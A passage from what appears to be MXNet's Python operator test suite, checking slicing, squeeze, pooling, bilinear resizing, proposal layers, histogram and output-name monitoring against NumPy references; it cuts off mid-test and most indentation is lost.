slice_sym = mx.sym.slice(data, begin=[0, None], end=[1, None], step=[2, -1])
check_numeric_gradient(slice_sym, [in_data])
def test_slice_partial_infer():
def check_slice_partial_infer(data, begin, end, step, expected_out_shape):
out = mx.sym.slice(data, begin=begin, end=end, step=step)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
def check_slice_axis_partial_infer(data, axis, begin, end, expected_out_shape):
out = mx.sym.slice_axis(data, axis=axis, begin=begin, end=end)
assert (out.infer_shape_partial()[1][0] == expected_out_shape), out.infer_shape_partial()[1]
var1 = mx.sym.var(name="data", shape=(0, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (0, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (0, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (0, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (0, 3))
var1 = mx.sym.var(name="data", shape=(10, 0))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, 0))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, 0))
with mx.np_shape():
var1 = mx.sym.var(name="data", shape=(-1, 20))
check_slice_partial_infer(var1, (None, None), (None, 10), [], (-1, 10))
check_slice_partial_infer(var1, (None, None), (None, 10), (None, 2), (-1, 5))
check_slice_partial_infer(var1, (None, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (None, 3), (5, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), [], (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (None, 1), (-1, 7))
check_slice_partial_infer(var1, (2, 3), (None, 10), (3, 3), (-1, 3))
var1 = mx.sym.var(name='data', shape=(10, -1))
check_slice_axis_partial_infer(var1, 0, 0, 5, (5, -1))
check_slice_axis_partial_infer(var1, 1, 0, 5, (10, -1))
@with_seed()
def test_float16_min_max():
"""Test for issue: https://github.com/apache/incubator-mxnet/issues/9007"""
a = mx.nd.array([np.finfo('float16').min, np.finfo('float16').max], dtype='float16')
assert a.dtype == np.float16
assert np.finfo('float16').min == mx.nd.min(a).asscalar()
assert np.finfo('float16').max == mx.nd.max(a).asscalar()
@with_seed()
@mx.use_np_shape
def test_zero_size_min_max():
def min():
a = mx.nd.zeros(shape=(5, 0))
a.min()
def max():
a = mx.nd.zeros(shape=(5, 0))
a.max()
assert_raises(MXNetError, min)
assert_raises(MXNetError, max)
@with_seed()
def test_squeeze_op():
def check_squeeze_op(shape, axis=None):
data = mx.nd.random.uniform(low=-10.0, high=10.0, shape=shape)
if axis is None:
out = mx.nd.squeeze(data).asnumpy()
out_expected = np.squeeze(data.asnumpy())
else:
out = mx.nd.squeeze(data, axis=axis).asnumpy()
out_expected = np.squeeze(data.asnumpy(), axis=axis)
if out.shape == (1,): # as an exception, an all-ones shape like (1, 1, 1, 1) is squeezed to (1,), not ()
out_expected = np.squeeze(data.asnumpy(), axis=tuple([i for i in range(1, len(shape))]))
assert same(out, out_expected)
# check forward
check_squeeze_op((1, 5, 1, 3, 1), 0)
check_squeeze_op((1, 5, 1, 3, 1), 2)
check_squeeze_op((1, 5, 1, 3, 1), 4)
check_squeeze_op((1, 5, 1, 3, 1), (0, 4))
check_squeeze_op((1, 5, 1, 3, 1), (0, 2, 4))
check_squeeze_op((1, 5, 1, 3, 1))
check_squeeze_op((1, 1, 1, 1))
# check gradient
data = mx.symbol.Variable('data')
shape = (1, 2, 1, 3, 1)
data_tmp = np.ones(shape)
test = mx.sym.squeeze(data)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=2)
check_numeric_gradient(test, [data_tmp])
test = mx.sym.squeeze(data, axis=(2, 4))
check_numeric_gradient(test, [data_tmp])
@with_seed()
def test_adaptive_avg_pool_op():
def py_adaptive_avg_pool(x, height, width):
# 2D per frame adaptive avg pool
def adaptive_avg_pool_frame(x, y):
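# Each output cell (oh, ow) averages the input window spanning rows
# [floor(oh*isizeH/osizeH), ceil((oh+1)*isizeH/osizeH)) and the analogous column range.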
isizeH, isizeW = x.shape
osizeH, osizeW = y.shape
for oh in range(osizeH):
istartH = int(np.floor(1.0 * (oh * isizeH) / osizeH))
iendH = int(np.ceil(1.0 * (oh + 1) * isizeH / osizeH))
kH = iendH - istartH
for ow in range(osizeW):
istartW = int(np.floor(1.0 * (ow * isizeW) / osizeW))
iendW = int(np.ceil(1.0 * (ow + 1) * isizeW / osizeW))
kW = iendW - istartW
xsum = 0
for ih in range(kH):
for iw in range(kW):
xsum += x[istartH+ih][istartW+iw]
y[oh][ow] = xsum / kH / kW
B,C,_,_ = x.shape
y = np.empty([B,C,height, width], dtype=x.dtype)
for b in range(B):
for c in range(C):
adaptive_avg_pool_frame(x[b][c], y[b][c])
return y
def check_adaptive_avg_pool_op(shape, output_height, output_width=None):
x = mx.nd.random.uniform(shape=shape)
if output_width is None:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=output_height)
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_height)
else:
y = mx.nd.contrib.AdaptiveAvgPooling2D(x, output_size=(output_height, output_width))
npy = py_adaptive_avg_pool(x.asnumpy(), output_height, output_width)
assert_almost_equal(y.asnumpy(), npy)
shape = (2, 2, 10, 10)
for i in range(1, 11):
check_adaptive_avg_pool_op(shape, i)
for j in range(1, 11):
check_adaptive_avg_pool_op(shape, i, j)
@with_seed()
def test_bilinear_resize_op():
def py_bilinear_resize(x, outputHeight, outputWidth):
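# NumPy reference: each output pixel (h2, w2) bilinearly interpolates the four input
# neighbours around (h2*rheight, w2*rwidth), with scale factors (in_size-1)/(out_size-1).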
batch, channel, inputHeight, inputWidth = x.shape
if outputHeight == inputHeight and outputWidth == inputWidth:
return x
y = np.empty([batch, channel, outputHeight, outputWidth])
rheight = 1.0 * (inputHeight - 1) / (outputHeight - 1) if outputHeight > 1 else 0.0
rwidth = 1.0 * (inputWidth - 1) / (outputWidth - 1) if outputWidth > 1 else 0.0
for h2 in range(outputHeight):
h1r = 1.0 * h2 * rheight
h1 = int(np.floor(h1r))
h1lambda = h1r - h1
h1p = 1 if h1 < (inputHeight - 1) else 0
for w2 in range(outputWidth):
w1r = 1.0 * w2 * rwidth
w1 = int(np.floor(w1r))
w1lambda = w1r - w1
w1p = 1 if w1 < (inputWidth - 1) else 0
for b in range(batch):
for c in range(channel):
y[b][c][h2][w2] = (1-h1lambda)*((1-w1lambda)*x[b][c][h1][w1] + \
w1lambda*x[b][c][h1][w1+w1p]) + \
h1lambda*((1-w1lambda)*x[b][c][h1+h1p][w1] + \
w1lambda*x[b][c][h1+h1p][w1+w1p])
return y
def py_bilinear_resize_backward(x, incoming_grads, mode='size'):
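# Reference backward pass: scatter each incoming gradient value back to the four input pixels
# it was interpolated from, weighted by the same bilinear coefficients.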
data1 = np.zeros_like(x)
data2 = incoming_grads
batchsize = data1.shape[0]
channels = data1.shape[1]
height1 = data1.shape[2]
width1 = data1.shape[3]
height2 = data2.shape[2]
width2 = data2.shape[3]
rheight = float(height1 - 1) / (height2 - 1) if (height2 > 1) else 0
rwidth = float(width1 - 1) / (width2 - 1) if (width2 > 1) else 0
# special case: just copy
if height1 == height2 and width1 == width2:
data1 += data2
return [data1]
for h2 in range(0, height2):
for w2 in range(0, width2):
h1r = rheight * h2
h1 = int(h1r)
h1p = 1 if (h1 < height1 - 1) else 0
h1lambda = h1r - h1
h0lambda = 1 - h1lambda
#
w1r = rwidth * w2
w1 = int(w1r)
w1p = 1 if (w1 < width1 - 1) else 0
w1lambda = w1r - w1
w0lambda = 1 - w1lambda
#
for n in range(0, batchsize):
for c in range(0, channels):
d2val = data2[n][c][h2][w2]
data1[n][c][h1][w1] += h0lambda * w0lambda * d2val
data1[n][c][h1][w1 + w1p] += h0lambda * w1lambda * d2val
data1[n][c][h1 + h1p][w1] += h1lambda * w0lambda * d2val
data1[n][c][h1 + h1p][w1 + w1p] += h1lambda * w1lambda * d2val
if mode == 'like':
return data1, np.zeros_like(incoming_grads)
return [data1]
def check_bilinear_resize_op(shape, height, width):
x = mx.nd.random.uniform(shape=shape)
y = mx.nd.contrib.BilinearResize2D(x, height=height, width=width)
assert_almost_equal(y, py_bilinear_resize(x.asnumpy(), height, width))
x_scale = width / shape[-1]
y_scale = height / shape[-2]
y = mx.nd.contrib.BilinearResize2D(x, scale_height=y_scale, scale_width=x_scale)
assert_almost_equal(y.asnumpy(), py_bilinear_resize(x.asnumpy(), height, width))
def check_bilinear_resize_align_corners_op():
img_shape = [1, 1, 3, 2]
data = [64, 32, 32, 64, 50, 100]
target_height = 6
target_width = 4
expected_data = {}
# align_corners = False
expected_data[0] = [
64.000, 56.000, 40.000, 32.000, 56.000, 52.000, 44.000, 40.000, 40.000, 44.000, 52.000, 56.000,
36.500, 45.625, 63.875, 73.000, 45.500, 56.875, 79.625, 91.000, 50.000, 62.500, 87.500, 100.000
]
# align_corners = True
expected_data[1] = [
64.000, 53.333, 42.667, 32.000, 51.200, 49.067, 46.933, 44.800, 38.400, 44.800, 51.200, 57.600,
35.600, 47.467, 59.333, 71.200, 42.800, 57.067, 71.333, 85.600, 50.000, 66.667, 83.333, 100.000
]
x = np.array(data, dtype=np.float32).reshape(img_shape)
x_nd = mx.nd.array(x)
y0 = np.array(expected_data[0]).reshape((1, 1, target_height, target_width))
y0_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=False)
assert_almost_equal(y0, y0_nd.asnumpy(), atol=1e-3)
y1 = np.array(expected_data[1]).reshape((1, 1, target_height, target_width))
y1_nd = mx.nd.contrib.BilinearResize2D(x_nd, height=target_height, width=target_width, mode='size', align_corners=True)
assert_almost_equal(y1, y1_nd.asnumpy(), atol=1e-3)
def check_bilinear_resize_modes_op(shape, scale_height=None, scale_width=None, shape_1=None, mode=None):
x = mx.nd.random.uniform(shape=shape)
original_h = shape[2]
original_w = shape[3]
if mode == 'odd_scale':
assert scale_height is not None and scale_width is not None
new_h = int(original_h * scale_height) if (original_h % 2) == 0 else \
int((original_h - 1) * scale_height) + 1
new_w = int(original_w * scale_width) if (original_w % 2) == 0 \
else int((original_w - 1) * scale_width) + 1
y = mx.nd.contrib.BilinearResize2D(x, scale_height=scale_height,
scale_width=scale_width,
mode='odd_scale')
elif mode == 'to_even_down':
new_h = original_h if (original_h % 2) == 0 else original_h - 1
new_w = original_w if (original_w % 2) == 0 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_down')
elif mode == 'to_even_up':
new_h = original_h if (original_h % 2) == 0 else original_h + 1
new_w = original_w if (original_w % 2) == 0 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_even_up')
elif mode == 'to_odd_down':
new_h = original_h if (original_h % 2) == 1 else original_h - 1
new_w = original_w if (original_w % 2) == 1 else original_w - 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_down')
elif mode == 'to_odd_up':
new_h = original_h if (original_h % 2) == 1 else original_h + 1
new_w = original_w if (original_w % 2) == 1 else original_w + 1
y = mx.nd.contrib.BilinearResize2D(x, mode='to_odd_up')
elif mode == 'like':
x_1 = mx.nd.random.uniform(shape=shape_1)
new_h = x_1.shape[2]
new_w = x_1.shape[3]
y = mx.nd.contrib.BilinearResize2D(x, x_1, mode='like')
new_shape_desired = np.array([shape[0], shape[1], new_h, new_w], dtype='int')
new_shape_got = np.array(y.shape, dtype='int')
data_sym = mx.sym.var('data')
data_np = x.asnumpy()
expected = py_bilinear_resize(data_np, new_h, new_w)
out_grads = np.ones([shape[0], shape[1], new_h, new_w])
expected_backward = py_bilinear_resize_backward(data_np, out_grads, mode)
assert_array_equal(new_shape_desired, new_shape_got, "Desired and got shapes are not equal. {} vs {}".format(
str(new_shape_desired.tolist()), str(new_shape_got.tolist())))
assert_almost_equal(y.asnumpy(), expected, 1e-3, 0)
if mode != 'like':
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, None, scale_height=scale_height, scale_width=scale_width, mode=mode)
check_symbolic_forward(resize_sym, [data_np], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np], rtol=1e-2, atol=1e-4)
else:
data_sym_like = mx.sym.var('data_like')
resize_sym = mx.sym.contrib.BilinearResize2D(data_sym, data_sym_like, mode=mode)
date_np_like = x_1.asnumpy()
check_symbolic_forward(resize_sym, [data_np, date_np_like], [expected], rtol=1e-3, atol=1e-5)
check_symbolic_backward(resize_sym, [data_np, date_np_like], [out_grads], expected_backward, rtol=1e-3, atol=1e-5)
check_numeric_gradient(resize_sym, [data_np, date_np_like], rtol=1e-2, atol=1e-4)
shape = (2, 2, 10, 10)
check_bilinear_resize_op(shape, 5, 5)
check_bilinear_resize_op(shape, 10, 10)
check_bilinear_resize_op(shape, 15, 15)
check_bilinear_resize_op(shape, 3, 7)
check_bilinear_resize_op(shape, 13, 17)
shape = (2, 2, 20, 20)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape = (2, 2, 21, 21)
check_bilinear_resize_modes_op(shape, scale_height=0.5, scale_width=0.5, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=5, scale_width=10, mode='odd_scale')
check_bilinear_resize_modes_op(shape, scale_height=0.1, scale_width=0.2, mode='odd_scale')
check_bilinear_resize_modes_op(shape, mode='to_even_down')
check_bilinear_resize_modes_op(shape, mode='to_even_up')
check_bilinear_resize_modes_op(shape, mode='to_odd_down')
check_bilinear_resize_modes_op(shape, mode='to_odd_up')
shape_0 = (2, 2, 21, 21)
shape_1 = (2, 2, 10, 10)
check_bilinear_resize_modes_op(shape_0, shape_1=shape_1, mode='like')
check_bilinear_resize_modes_op(shape_1, shape_1=shape_0, mode='like')
check_bilinear_resize_align_corners_op()
def test_multi_proposal_op():
# parameters
feature_stride = 16
scales = (8, 16, 32)
ratios = (0.5, 1, 2)
rpn_pre_nms_top_n = 12000
rpn_post_nms_top_n = 2000
threshold = 0.7
rpn_min_size = 16
batch_size = 20
feat_len = (1000 + 15) // 16
H, W = feat_len, feat_len
num_anchors = len(scales) * len(ratios)
count_anchors = H * W * num_anchors
'''
cls_prob: (batch_size, 2 * num_anchors, H, W)
bbox_pred: (batch_size, 4 * num_anchors, H, W)
im_info: (batch_size, 3)
'''
cls_prob = mx.nd.empty((batch_size, 2 * num_anchors, H, W), dtype = np.float32)
bbox_pred = mx.nd.empty((batch_size, 4 * num_anchors, H, W), dtype = np.float32)
im_info = mx.nd.empty((batch_size, 3), dtype = np.float32)
cls_prob = mx.nd.array(np.random.random(cls_prob.shape))
bbox_pred = mx.nd.array(np.random.random(bbox_pred.shape))
for i in range(batch_size):
im_size = np.random.randint(100, feat_len * feature_stride, size = (2,))
im_scale = np.random.randint(70, 100) / 100.0
im_info[i, :] = [im_size[0], im_size[1], im_scale]
def get_sub(arr, i):
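# Slice out sample i while keeping a leading batch dimension of size 1.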
new_shape = list(arr.shape)
new_shape[0] = 1
res = arr[i].reshape(new_shape)
return res
def check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
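# Run Proposal on each sample separately and MultiProposal on the whole batch; the stacked
# per-sample outputs must match the batched outputs.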
single_proposal = []
single_score = []
for i in range(batch_size):
rois, score = mx.nd.contrib.Proposal(
cls_prob = get_sub(cls_prob, i),
bbox_pred = get_sub(bbox_pred, i),
im_info = get_sub(im_info, i),
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal.append(rois)
single_score.append(score)
multi_proposal, multi_score = mx.nd.contrib.MultiProposal(
cls_prob = cls_prob,
bbox_pred = bbox_pred,
im_info = im_info,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = True)
single_proposal = mx.nd.stack(*single_proposal).reshape(multi_proposal.shape)
single_score = mx.nd.stack(*single_score).reshape(multi_score.shape)
single_proposal_np = single_proposal.asnumpy()
multi_proposal_np = multi_proposal.asnumpy()
single_score_np = single_score.asnumpy()
multi_score_np = multi_score.asnumpy()
# check rois x1,y1,x2,y2
assert np.allclose(single_proposal_np[:, 1:], multi_proposal_np[:, 1:])
# check rois batch_idx
for i in range(batch_size):
start = i * rpn_post_nms_top_n
end = start + rpn_post_nms_top_n
assert (multi_proposal_np[start:end, 0] == i).all()
# check score
assert np.allclose(single_score_np, multi_score_np)
def check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n):
im_info_sym = mx.sym.Variable('im_info')
cls_prob_sym = mx.sym.Variable('cls_prob')
bbox_pred_sym = mx.sym.Variable('bbox_pred')
sym = mx.sym.contrib.MultiProposal(
cls_prob = cls_prob_sym,
bbox_pred = bbox_pred_sym,
im_info = im_info_sym,
feature_stride = feature_stride,
scales = scales,
ratios = ratios,
rpn_pre_nms_top_n = rpn_pre_nms_top_n,
rpn_post_nms_top_n = rpn_post_nms_top_n,
threshold = threshold,
rpn_min_size = rpn_min_size, output_score = False)
location = [cls_prob.asnumpy(), bbox_pred.asnumpy(), im_info.asnumpy()]
expected = [np.zeros_like(e) for e in location]
out_grads = [np.ones((rpn_post_nms_top_n, 5))]
check_symbolic_backward(sym, location, out_grads, expected)
check_forward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
check_forward(rpn_pre_nms_top_n, 1500)
check_forward(1000, 500)
check_backward(rpn_pre_nms_top_n, rpn_post_nms_top_n)
@with_seed()
def test_quadratic_function():
def f(x, a, b, c):
return a * x**2 + b * x + c
a = np.random.random_sample()
b = np.random.random_sample()
c = np.random.random_sample()
data = mx.symbol.Variable('data')
quad_sym = mx.sym.contrib.quadratic(data=data, a=a, b=b, c=c)
for dtype in [np.float16, np.float32, np.float64]:
tol = 1e-2 if dtype is np.float16 else 1e-5
for ndim in range(1, 6):
shape = rand_shape_nd(ndim, 5)
data_np = np.random.randn(*shape).astype(dtype)
expected = f(data_np, a, b, c)
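            # analytic gradient of the quadratic: d/dx (a*x^2 + b*x + c) = 2*a*x + b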
backward_expected = 2 * a * data_np + b
# check imperative forward
output = mx.nd.contrib.quadratic(mx.nd.array(data_np), a=a, b=b, c=c)
assert_almost_equal(output, expected, rtol=tol, atol=tol)
# check forward
check_symbolic_forward(quad_sym, [data_np], [expected], rtol=tol, atol=tol)
# check backward
check_symbolic_backward(quad_sym, [data_np], [np.ones(expected.shape)],
[backward_expected], rtol=tol, atol=tol)
# check backward using finite difference
check_numeric_gradient(quad_sym, [data_np], atol=0.001)
def allclose_function(contexts):
def getRandom(base, percent = 1.):
return base * (1 + percent * (2 * np.random.random_sample() - 1.) / 100)
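    # getRandom jitters `base` by up to +/- `percent` percent so each run exercises slightly different tolerances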
title = 'exp'
for ctx in contexts:
title += ' cpu' if ctx == mx.cpu() else ' gpu'
title += ' nElem shape'
num_ctx = len(contexts)
result = [False, False]
for dtype in [np.float16, np.float32, np.float64]:
rtol = getRandom(1e-2 if dtype is np.float16 else 1e-5)
atol = getRandom(1e-4 if dtype is np.float16 else 1e-7)
print('\nnumpy.{}: atol = {} rtol = {}'.format(dtype.__name__, atol, rtol))
print(title)
for ndim in range(1, 10):
shape = rand_shape_nd(ndim, 8)
a_np = np.random.randn(*shape).astype(dtype)
b_np = (a_np + np.random.randn(*shape).astype(dtype) / 10000000).astype(dtype)
expected = np.allclose(a_np, b_np, rtol, atol)
for n, ctx in enumerate(contexts):
a_ctx = mx.nd.array(a_np, dtype = dtype, ctx=ctx)
b_ctx = mx.nd.array(b_np, dtype = dtype, ctx=ctx)
output = mx.nd.contrib.allclose(a_ctx, b_ctx, rtol=rtol, atol=atol)
result[n] = output.asnumpy() == 1
if expected != result[n]:
                    # Prepare the elements of the array that are considered "not close", together with
                    # the corresponding elements of the comparison CPU/GPU/Python vectors that are considered "close"
v_ctx = 'CPU' if ctx == mx.cpu() else 'GPU'
if expected:
v_cmp = 'Python'
a_b = a_ctx.asnumpy()
b_b = b_ctx.asnumpy()
a_g = np.asarray(a_np)
b_g = np.asarray(b_np)
else:
v_cmp = v_ctx
v_ctx = 'Python'
a_b = np.asarray(a_np)
b_b = np.asarray(b_np)
a_g = a_ctx.asnumpy()
b_g = b_ctx.asnumpy()
print('\n *** Violations found on %s, but not on %s side ***' % (v_ctx, v_cmp))
frmt = " a[{0:d}]: b[{0:d}]:" \
" abs(a[{0:d}]-b[{0:d}]) - atol + rtol*abs(b[{0:d}]):"
# Define the indices of all violations and corresponding values of coordinates
bad_indexes = np.abs(a_b - b_b) >= atol + rtol * abs(b_b)
a_values = [a_b[bad_indexes], a_g[bad_indexes]]
b_values = [b_b[bad_indexes], b_g[bad_indexes]]
                    idx = np.argwhere(bad_indexes)
                    idx_flat = np.flatnonzero(bad_indexes)
for i in range(len(a_values[0])):
flat_idx = idx_flat[i]
print('{}: index = {} flat_index = {}'.format('%4d'%i, idx[i], flat_idx))
print(frmt.format(flat_idx))
for j in range(2):
diff = np.abs(a_values[j][i]-b_values[j][i]) - atol + rtol*abs(b_values[j][i])
print('{}: {} {} {}'.format('%6s'%v_ctx, a_values[j][i], b_values[j][i], diff))
if num_ctx == 1:
print(' {0:d} {1:d} {2:10d} {3:}'.format(expected, result[0], np.prod(shape), shape))
else:
print(' {0:d} {1:d} {2:d} {3:10d} {4:}'.format(expected, result[0], result[1], np.prod(shape), shape))
if expected != result[0] or num_ctx > 1 and expected != result[1]:
assert False
@with_seed()
def test_allclose_function():
allclose_function([default_context()])
@with_seed()
def test_histogram():
def f(x, bins=10, range=None):
return np.histogram(x, bins, range=range)
for ndim in range(1, 6):
shape = rand_shape_nd(ndim)
x = rand_ndarray(shape, stype='default', dtype=np.float64)
mx_bins = mx.nd.array([-1.0, 0.5, 2.0, 4.5, 50.0], dtype=np.float64)
np_bins = mx_bins.asnumpy()
bin_cnt = random.randint(2, 10)
bin_range = (-2.5, 2.5)
mx_histo1, mx_bins1 = mx.nd.histogram(x, bins=bin_cnt, range=bin_range)
np_histo1, np_bins1 = f(x.asnumpy(), bins=bin_cnt, range=bin_range)
assert_almost_equal(mx_bins1, np_bins1)
assert_almost_equal(mx_histo1, np_histo1, rtol=1e-3, atol=1e-5)
mx_histo2, mx_bins2 = mx.nd.histogram(x, bins=mx_bins)
np_histo2, np_bins2 = f(x.asnumpy(), bins=np_bins)
assert_almost_equal(mx_histo2, np_histo2, rtol=1e-3, atol=1e-5)
assert_almost_equal(mx_bins2, np_bins2, rtol=1e-3, atol=1e-5)
data = mx.sym.Variable("data")
bins = mx.sym.Variable("bins")
histo1 = mx.sym.histogram(a=data, bins=bin_cnt, range=bin_range)
histo2 = mx.sym.histogram(a=data, bins=bins)
executor1 = histo1.bind(ctx=default_context(), args={"data" : x})
executor1.forward(is_train=False)
assert_almost_equal(np_histo1, executor1.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo1", "FORWARD_histo1"), equal_nan=False)
executor2 = histo2.bind(ctx=default_context(), args={"data" : x, "bins" : mx_bins})
executor2.forward(is_train=False)
assert_almost_equal(np_histo2, executor2.outputs[0].asnumpy(), 0, 0, ("EXPECTED_histo2", "FORWARD_histo2"), equal_nan=False)
def test_op_output_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=False)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
            # skip errors since the test only checks output names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
    if is_windows:
        # Windows doesn't support setting environment variables on the fly, so skip this for now
pass
else:
        # Disable the subgraph backend so it does not rewrite the symbol being monitored
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['pooling_output'])
    os.environ.pop('MXNET_SUBGRAPH_BACKEND', None)  # the variable is never set on Windows
def test_op_all_names_monitor():
def check_name(op_sym, expected_names):
output_names = []
def get_output_names_callback(name, arr):
output_names.append(py_str(name))
op_exe = op_sym.simple_bind(ctx=mx.current_context(), grad_req='null')
op_exe.set_monitor_callback(get_output_names_callback, monitor_all=True)
try:
op_exe.forward()
mx.nd.waitall()
except mx.base.MXNetError:
            # skip errors since the test only checks tensor names
pass
for output_name, expected_name in zip(output_names, expected_names):
assert output_name == expected_name
is_windows = sys.platform.startswith('win')
    if is_windows:
        # Windows doesn't support setting environment variables on the fly, so skip this for now
pass
else:
        # Disable the subgraph backend so it does not rewrite the symbol being monitored
os.environ['MXNET_SUBGRAPH_BACKEND'] = "NONE"
data = mx.sym.Variable('data', shape=(10, 3, 10, 10))
conv_sym = mx.sym.Convolution(data, kernel=(2, 2), num_filter=1, name='conv')
check_name(conv_sym, ['data', 'conv_data', 'conv_weight', 'conv_weight', 'conv_bias', 'conv_bias', 'conv_output'])
deconv_sym = mx.sym.Deconvolution(data, kernel=(2, 2), num_filter=1, name='deconv')
check_name(deconv_sym, ['data', 'deconv_data', 'deconv_weight', 'deconv_weight', 'deconv_output'])
fc_sym = mx.sym.FullyConnected(data, num_hidden=10, name='fc')
check_name(fc_sym, ['data', 'fc_data', 'fc_weight', 'fc_weight', 'fc_bias', 'fc_bias', 'fc_output'])
lrn_sym = mx.sym.LRN(data, nsize=1, name='lrn')
check_name(lrn_sym, ['data', 'lrn_data', 'lrn_output', 'lrn_tmp_norm'])
act_sym = mx.sym.Activation(data, act_type='relu', name='act')
check_name(act_sym, ['data', 'act_input0', 'act_output'])
cc_sym = mx.sym.concat(data, data, dim=0, name='concat')
check_name(cc_sym, ['data', 'concat_arg0', 'data', 'concat_arg1', 'concat_output'])
sm_sym = mx.sym.softmax(data, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'softmax_output'])
length = mx.sym.Variable("length", shape=(10, 10, 10))
sm_sym = mx.sym.softmax(data, length, axis=1, use_length=True, name='softmax')
check_name(sm_sym, ['data', 'softmax_data', 'length', 'softmax_length', 'softmax_output'])
sa_sym = mx.sym.SoftmaxActivation(data, name='softmax')
check_name(sa_sym, ['data', 'softmax_input0', 'softmax_output'])
us_sym = mx.sym.UpSampling(data, scale=2, sample_type='nearest',
name='upsampling')
check_name(us_sym, ['data', 'upsampling_arg0', 'upsampling_output'])
us_sym = mx.sym.Pooling(data, kernel=(2, 2), pool_type='avg',
name='pooling')
check_name(us_sym, ['data', 'pooling_data', 'pooling_output'])
    os.environ.pop('MXNET_SUBGRAPH_BACKEND', None)  # the variable is never set on Windows
@with_seed()
@unittest.skip("test fails intermittently. temporarily disabled till it gets fixed. tracked at https://github.com/apache/incubator-mxnet/issues/13915")
def test_activation():
shapes = [(9,), (9, 10), (9, 10, 10), (1, 9, 10, 10)]
dtype_l = [np.float64, np.float32, np.float16]
rtol_l = [1e-7, 1e-6, 1e-2]
atol_l = [1e-7, 1e-6, 1e-2]
rtol_fd = 1e-5
atol_fd = 1e-6
num_eps = 1e-6
unary_ops = {
'relu': [lambda x: mx.sym.Activation(x, act_type='relu'),
lambda x: np.maximum(x, 0.),
lambda x: 1. * (x > 0.),
-5.0, 5.0],
'sigmoid': [lambda x: mx.sym.Activation(x, act_type='sigmoid'),
lambda x: 1. / (np.exp(-x) + 1.),
lambda x: 1. / (np.exp(-x) + 1.) / (np.exp(x) + 1.),
-3.0, 3.0],
'tanh': [lambda x: mx.sym.Activation(x, act_type='tanh'),
lambda x: np.tanh(x),
lambda x: 1. - np.tanh(x) ** 2,
-4.0, 4.0],
'softrelu': [lambda x: mx.sym.Activation(x, act_type='softrelu'),
lambda x: np.log(1. + np.exp(x)),
lambda x: 1. - 1 / (1 + np.exp(x)),
